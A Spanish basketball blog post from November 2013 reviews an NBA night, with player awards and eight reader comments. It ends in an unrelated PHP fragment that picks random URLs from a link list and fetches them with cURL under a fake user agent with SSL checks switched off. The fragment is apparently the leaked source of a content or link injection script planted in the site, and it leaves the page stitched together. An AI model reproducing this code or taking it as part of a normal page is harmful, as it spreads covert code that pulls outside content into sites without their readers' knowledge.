La crónica: Manita de Pacers y estreno de Celtics y Wizards

07 de November de 2013 por TheDeerHunter

Interesante jornada. Los Pacers se volvieron a mostrar implacables, esta vez ante un rival directo como Chicago y les superaron en su propio terreno, la defensa. Unos invictos consiguen el 5-0 y los otros quedan en una preocupante situación, empatados con una única victoria (y gracias) en la cola de la conferencia (80-97).

Y es que tanto Celtics como Wizards aprovecharon su enfrentamiento contra rivales asequibles para darse un respiro. Stevens estrenó su registro de victorias ante unos inoperantes Jazz (87-97) y Washington visitaba Philadelphia, que empiezan a mostrar sus verdaderas carencias. Excelentes sensaciones colectivas de los Wizards, con 7 hombres en dobles dígitos, y victoria cómoda (116-102).

En Orlando, los Magic sorprendieron a los Clippers gracias a un monumental Nikola Vucevic y continúan invictos en casa y con balance positivo (90-98). En Memphis, Zach Randolph se tuvo que ausentar a medio partido por el nacimiento de un futuro Power Forward y los Pelicans lo aprovecharon destrozando a los locales (99-84). ¿Se convertirá Anthony Davis en el Defensive Player of the Year más joven de la historia? Ayer consiguió 9 rebotes, 3 robos y 3 tapones y sus medias son impresionantes (4 tapones y 2’2 robos por partido).

El resto de candidatos sí cumplió. Victoria fácil de Oklahoma ante Dallas con Serge Ibaka como mejor hombre (93-107); algo más ajustada de los Spurs ante Phoenix (96-99) y una más que convincente de Golden State en Minnesota, aunque con conato de lesión de Curry (106-93). Parece que no será nada y Warriors y Spurs empatan en la cabeza del Oeste. Volvió Harrison Barnes, por cierto, y anotó 14 puntos en 14 minutos.

Por último, gran victoria de los Bucks ante Cleveland que les mete en zona playoffs, aún con las bajas de Sanders, Ilyasova y Brandon Knight (104-109); y también muy meritoria la de Charlotte ante Toronto que les pone nada menos que cuartos en la conferencia a pesar de no contar con su fichaje estrella, Al Jefferson (90-92).

PREMIOS

MVP: Sensacional actuación de Nikola Vucevic, omnipresente. 30 puntos, 21 rebotazos, 1 tapón, 1 robo y 3 asistencias.

Rookie: Por fin un buen partido de Kelly Olynyk que además se tradujo en victoria. 14 puntos, 8 rebotes, 3 asistencias y 1 robo.

Sorpresa: Le tocó a John Henson sustituir en el último momento a Ilyasova y lo hizo francamente bien. 14 puntos, 9 rebotes, 3 tapones y 3 asistencias. Clave en la victoria. Danny Green recuperó sensaciones pasadas y anotó 19 puntos con un 8 de 11 en tiros de campo. Además puso 4 tapones.

Dcepción: Mal día para los españoles. Intrascendentes tanto Marc Gasol (11 puntos y 1 rebotes), como Ricky Rubio (7 puntos con 2 de 8, 7 asistencias y 4 pérdidas) como Jose Calderon (9 puntos y 3 asistencias) y derrota de los tres. Carlos Boozer venía siendo el mejor de los Bulls en este arranque de temporada pero ayer se quedó en 6 puntos y 9 rebotes.

Esfuerzo en vano: Dicen que los malos momentos arman el carácter. Extraordinario Gordon Hayward con su equipo tocando fondo. 28 puntos, 9 rebotes, 5 asistencias y 1 robo.

TOP-10

Comenta

8 comentarios a esta entrada

  1. Laker1624 dice:
    #1

    Estos Pacers van lanzados, aunque también hay que decir que los Bulls no pasan por su mejor momento precisamente, a ver si Rose espabila.

    Otros que me parece que lo van a pasar mal son los Knicks, sin Chandler se les complica más la vida. Los equipos que jueguen contra New York se pueden hinchar en la zona durante el mes y medio que falte Chandler, y como no consigan reconducir la situación el futuro de Melo en la Gran Manzana puede tener los días contados. Vale que esto solo acaba de empezar y tal, pero de momento no tiene buena pinta la cosa.

    Los Wizards han ganado el primer partido, pero no los veo montando el mismo festival de triples cada día, por lo que en mi opinión aun les queda mucho trabajo por hacer en la capital.

    En cuanto a Clippers, tengo la sensación que van a sufrir mucho los días que no se puedan ir a 110 puntos o mas, al igual que Warriors. Por eso no los veo dando mucha guerra en PO, donde los partidos no tienen el ritmo de la RS. Aunque creo que los Warriors tienen menos carencias defensivas que los de LA.

    Mención especial para la primera canasta en juego de Anthony Bennett en la NBA, al menos ha sido un triple…

      Citar

  2. Viva_Dirk dice:
    #2

    Viendo el Chicago-Indiana confirmo algo que dije ayer: el juego del oeste sigue siendo mucho mas ofensivo, para ver partidos de regular season prefiero un Suns-Mavericks que el de ayer.

    Los Pacers son el equipo mas conjuntado de la liga ahora mismo junto con los Heat o los Spurs, y tienen mas plantilla que ambos para ir ganando con mas solvencia. Hibbert es un terror en la zona para los rivales, ayer les amargó la vida a Boozer y Noah el solo.

      Citar

  3. Esteban dice:
    #3

    hagamonos un poco de eco de que a los Pcers les estan faltando Granger, Hill y Coopeland

    cuando esten todos, pueden ser el nuevo equipo a batir

    lo mejor: estos si tienen ritmo de juego estilo PO

      Citar

  4. GreenPride dice:
    #4

    De anoche vi el Pacers Vs Bulls. Gran victoria de los Pacers que tras tres cuartos igualados sacaron del partido a los Bulls a base de defensa y contragolpes y juego intenso. Todos contribuyen y como dice Esteban todavía les faltan Granger, Hill y Copeland. Sin duda han armado un equipo para luchar por el anillo. A los Bulls les está costando arrancar al igual que a Rose lo cual es normal tras año y medio sin jugar su estrella. Que nadie dude que llegado el momento serán un rival temible pero ahora mismo todavía están lejos de poder plantar cara a los de Indiana.
    Del resto parece que los Warriors van en serio y los Spurs como siempre a la chita callando primeros del Oeste. Ah! Y primera victoria para mis Celtics… aprovechemos que no será muy habitual verles ganar esta temporada.

      Citar

  5. Laker1624 dice:
    #5

    Indiana tiene un equipazo, y si consiguen que los jugadores que ahora les faltan se acoplen bien (especialmente Granger) ya puede ser la ostia. Pero para mi el rival a batir siguen siendo los Heat, ya sabemos de lo que es capaz señor Lebron llega la hora de la verdad, y aunque los Pacers ya han demostrado que pueden complicarle mucho la vida a los Heat, aun no han demostrado lo suficiente como para considerarlos el rival a batir por encima de los vigentes campeones.

    Los Clippers y Warriors me recuerdan un poco a los Suns de Nash, Amare, Marion, d’Antoni y compañía, son equipos muy vistosos y espectaculares que en PO no llegan a plantar cara a los pesos pesados porque no pueden imponer su ritmo arrollador. Yo tengo mas fe en los Warriors, porque por plantilla pienso que puede dominar más registros de juego, pero ya veremos.

      Citar

  6. Vader dice:
    #6

    Yo tmb veo mucho mas peligrosos a Warriors que Clippers. Tienen mucha mejor plantilla y mejor quinteto inicial, con la vuelta de Barnes ya son temibles. A los Clippers les falla que su escolta y alero titulares no son defensores nivel contender… No defienden igual Reddick y Dudley que Pierce y Bradley.

    Saludos

      Citar

  7. Pop dice:
    #7

    Habéis visto a Irving a.k.a. “Uncle Drew”? Jejeje

      Citar

  8. the wolf1991 dice:
    #8

    Hay parte 2 y parte 3 de hecho…

    https://www.youtube.com/watch?v=TZUd9KYn_Rs

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>